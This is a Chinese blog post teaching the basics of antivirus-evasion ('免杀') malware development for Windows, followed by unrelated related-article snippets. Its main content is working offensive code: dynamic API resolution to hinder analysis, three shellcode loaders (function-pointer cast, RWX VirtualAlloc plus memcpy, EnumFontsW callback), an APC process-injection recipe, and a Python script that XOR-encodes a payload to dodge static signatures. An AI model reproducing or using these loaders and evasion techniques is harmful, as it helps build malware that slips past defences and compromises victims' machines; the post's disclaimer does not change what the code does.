免杀开发基础(1)

2024-04-12 20:44
文章标签 基础 开发 免杀

本文主要是介绍免杀开发基础(1),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

目录

前言

个人介绍 

我的技术与生活——小站首页 | Hexo (xiaoyunxi.wiki)https://xiaoyunxi.wiki/

免杀开发基基础

动态函数加载和执行

Shellcode执行技术

1.指针执行

2.申请内存指针执行

3.回调函数

注入技术

shellcode加密手段


title: 免杀开发基础(1)
author: 404Xyunxi_
date: 2024-04-12 15:22:12

前言

免责声明

    以下漏洞均已经上报漏洞平台。请勿利用文章内的相关技术从事非法测试。若因此产生一切后果与本博客及本人无关。

分享声明

           此篇博文为微信公众号小呆安全的404Xyunxi_师傅投稿的,经过本人同意,进行分享

个人介绍 

                                                      不知名普通本科院校

                                                     软件工程入坑网络安全

                                                  刚入坑教育SRC不到两个月

                                获得过两张985,211的漏报送证书,和一张教育部的证书

                                               一张CNVD原创事件型漏洞证书                                                           

我的技术与生活——小站首页 | Hexo (xiaoyunxi.wiki)icon-default.png?t=N7T8https://xiaoyunxi.wiki/

免杀开发基基础

    本文将探讨与Windows操作系统恶意软件开发相关的基本原理和技术,我们将从探索WinAPI开始,了解代码操作如何在恶意软件开发的背景下工作。我们将介绍动态加载函数和在代码中执行函数等内容。接下来,我们将研究模糊处理和有效负载编码。我们将使用XORAES加密等技术来使恶意代码更难被检测到。

动态函数加载和执行

    是时候进行一些代码的操作了,我们要把代码分解清楚,这样你就能知道发生了什么。

int main(void) {
MessageBoxA(0, "Foo Here.", "info", 0);return 0;
}

     这是一个简单的程序。它使用MessageBoxA函数,该函数是Windows API的当中的一个。此函数显示一个带有指定文本和标题的对话框。在这段代码中,我们直接调用MessageBoxA函数来显示一个消息框。MessageBoxA函数在编译过程中静态链接到程序。这意味着函数的代码包含在程序中,因此不需要在运行时加载它。

   现在,让我们将其与以下代码进行对比:

int main(void) {size_t get_MessageBoxA = (size_t)GetProcAddress( LoadLibraryA("USER32.dll"), "MessageBoxA" );
def_MessageBoxA msgbox_a = (def_MessageBoxA) get_MessageBoxA;
msgbox_a(0, "Foo Here.", "info", 0);return 0;
}

    在这段代码中,我们采用了不同的方法。我们使用MessageBoxA函数动态加载并调用GetProcAddress函数。此函数在运行时从USER32.dll库中检索MessageBoxA函数的地址。

   为了使用这个动态加载的函数,我们定义了一个函数指针类型def_MessageBoxA,它与MessageBoxA函数的签名相匹配。然后我们将获得的函数地址转换为这个函数指针,并使用它来调用函数。

   那么,这与恶意软件有什么关系呢?通过动态加载函数,我们可以避免静态链接到可疑库,这意味着可以使得木马更加难以被分析。这些都是理解如何调整和操作代码的基本概念。

    calc.exe将调用win32 API函数:向操作系统发送请求以创建此进程并开始执行的进程。

Shellcode执行技术

Shellcode执行方式简介一下三种。

1.最常见的一种加载shellcode的方法,使用指针来执行函数

2.申请一段动态内存,然后把shellcode放进去,随后强转为一个函数类型指针,最后调用

3.回调函数执行,申请一段动态内存,将shellcode拷贝进去,然后回调函数执行。

1.指针执行

#include <Windows.h>
#include <stdio.h>
unsigned char buf[] ="你的shellcode";
int main()
{
•   ((void(*)(void)) & buf)();
}

2.申请内存指针执行

#include <Windows.h>
#include <stdio.h>
int main()
{char shellcode[] = "你的shellcode";void* zx = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);memcpy(zx, shellcode, sizeof shellcode);((void(*)())zx)();
}

3.回调函数

#include <Windows.h>
unsigned char shellcode[] = "shellcode";
int main() {
LPVOID address = VirtualAlloc(NULL, sizeof(shellcode), MEM_RESERVE
|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(address, shellcode, sizeof(shellcode));
HDC dc = GetDC(NULL);
EnumFontsW(dc, NULL, (FONTENUMPROCW)address, NULL);
return 0;
}

注入技术

    APC注入利用了异步过程调用。APC是一种软件中断,因为它们必须能够改变程序的主执行路径。例如,Windows API函数ReadFileEx 允许用户编写一些代码,这些代码将在I/O操作完成时执行。为了实现这一点,I/O操作必须找到一种方法来返回最初调用ReadFileEx的线程。这又通过将APC排队到进行I/O调用的线程来实现。

1.枚举线程和进程-ToolHelp 32 Snapshot,
2.获取进程PID。获取目标进程的句柄- OpenProcess。
3.在目标进程分配新内存- VirtualAllocEx。
4.将有效负载写入新分配的内存- WriteProcessMemory。
5.更改内存保护- VirtualProtectEx。
6.对有效负载进行排队-挂起用户APC。
7.等待例程将线程置于可报警状态,SleepEx()、WaitForSingleObjectEx()、WaitForMultipleObjectEx()、Sleep()。

shellcode加密手段

采用异或加密,规避静态特征,以下是python加密脚本。

def xor_encrypt_decrypt(input_file, key):with open(input_file, 'rb') as f:
•    data = f.read()# 进行异或操作encrypted_data = bytes([byte ^ key for byte in data])return encrypted_data
​
​
input_file = 'payload.bin'
key = 0xc5  # 这是加密/解密所使用的密钥
encrypted_result = xor_encrypt_decrypt(input_file, key)
print("加密结果:")
print(encrypted_result)

                   总结:这只是免杀的凤毛麟角,免杀不光是代码,还有灵活的思路。

这篇关于免杀开发基础(1)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/898196

相关文章

这15个Vue指令,让你的项目开发爽到爆

1. V-Hotkey 仓库地址: github.com/Dafrok/v-ho… Demo: 戳这里 https://dafrok.github.io/v-hotkey 安装: npm install --save v-hotkey 这个指令可以给组件绑定一个或多个快捷键。你想要通过按下 Escape 键后隐藏某个组件,按住 Control 和回车键再显示它吗?小菜一碟: <template

Hadoop企业开发案例调优场景

需求 (1)需求:从1G数据中,统计每个单词出现次数。服务器3台,每台配置4G内存,4核CPU,4线程。 (2)需求分析: 1G / 128m = 8个MapTask;1个ReduceTask;1个mrAppMaster 平均每个节点运行10个 / 3台 ≈ 3个任务(4    3    3) HDFS参数调优 (1)修改:hadoop-env.sh export HDFS_NAMENOD

嵌入式QT开发:构建高效智能的嵌入式系统

摘要: 本文深入探讨了嵌入式 QT 相关的各个方面。从 QT 框架的基础架构和核心概念出发,详细阐述了其在嵌入式环境中的优势与特点。文中分析了嵌入式 QT 的开发环境搭建过程,包括交叉编译工具链的配置等关键步骤。进一步探讨了嵌入式 QT 的界面设计与开发,涵盖了从基本控件的使用到复杂界面布局的构建。同时也深入研究了信号与槽机制在嵌入式系统中的应用,以及嵌入式 QT 与硬件设备的交互,包括输入输出设

OpenHarmony鸿蒙开发( Beta5.0)无感配网详解

1、简介 无感配网是指在设备联网过程中无需输入热点相关账号信息,即可快速实现设备配网,是一种兼顾高效性、可靠性和安全性的配网方式。 2、配网原理 2.1 通信原理 手机和智能设备之间的信息传递,利用特有的NAN协议实现。利用手机和智能设备之间的WiFi 感知订阅、发布能力,实现了数字管家应用和设备之间的发现。在完成设备间的认证和响应后,即可发送相关配网数据。同时还支持与常规Sof

活用c4d官方开发文档查询代码

当你问AI助手比如豆包,如何用python禁止掉xpresso标签时候,它会提示到 这时候要用到两个东西。https://developers.maxon.net/论坛搜索和开发文档 比如这里我就在官方找到正确的id描述 然后我就把参数标签换过来

零基础学习Redis(10) -- zset类型命令使用

zset是有序集合,内部除了存储元素外,还会存储一个score,存储在zset中的元素会按照score的大小升序排列,不同元素的score可以重复,score相同的元素会按照元素的字典序排列。 1. zset常用命令 1.1 zadd  zadd key [NX | XX] [GT | LT]   [CH] [INCR] score member [score member ...]

Linux_kernel驱动开发11

一、改回nfs方式挂载根文件系统         在产品将要上线之前,需要制作不同类型格式的根文件系统         在产品研发阶段,我们还是需要使用nfs的方式挂载根文件系统         优点:可以直接在上位机中修改文件系统内容,延长EMMC的寿命         【1】重启上位机nfs服务         sudo service nfs-kernel-server resta

【区块链 + 人才服务】区块链集成开发平台 | FISCO BCOS应用案例

随着区块链技术的快速发展,越来越多的企业开始将其应用于实际业务中。然而,区块链技术的专业性使得其集成开发成为一项挑战。针对此,广东中创智慧科技有限公司基于国产开源联盟链 FISCO BCOS 推出了区块链集成开发平台。该平台基于区块链技术,提供一套全面的区块链开发工具和开发环境,支持开发者快速开发和部署区块链应用。此外,该平台还可以提供一套全面的区块链开发教程和文档,帮助开发者快速上手区块链开发。

Vue3项目开发——新闻发布管理系统(六)

文章目录 八、首页设计开发1、页面设计2、登录访问拦截实现3、用户基本信息显示①封装用户基本信息获取接口②用户基本信息存储③用户基本信息调用④用户基本信息动态渲染 4、退出功能实现①注册点击事件②添加退出功能③数据清理 5、代码下载 八、首页设计开发 登录成功后,系统就进入了首页。接下来,也就进行首页的开发了。 1、页面设计 系统页面主要分为三部分,左侧为系统的菜单栏,右侧

【Linux 从基础到进阶】Ansible自动化运维工具使用

Ansible自动化运维工具使用 Ansible 是一款开源的自动化运维工具,采用无代理架构(agentless),基于 SSH 连接进行管理,具有简单易用、灵活强大、可扩展性高等特点。它广泛用于服务器管理、应用部署、配置管理等任务。本文将介绍 Ansible 的安装、基本使用方法及一些实际运维场景中的应用,旨在帮助运维人员快速上手并熟练运用 Ansible。 1. Ansible的核心概念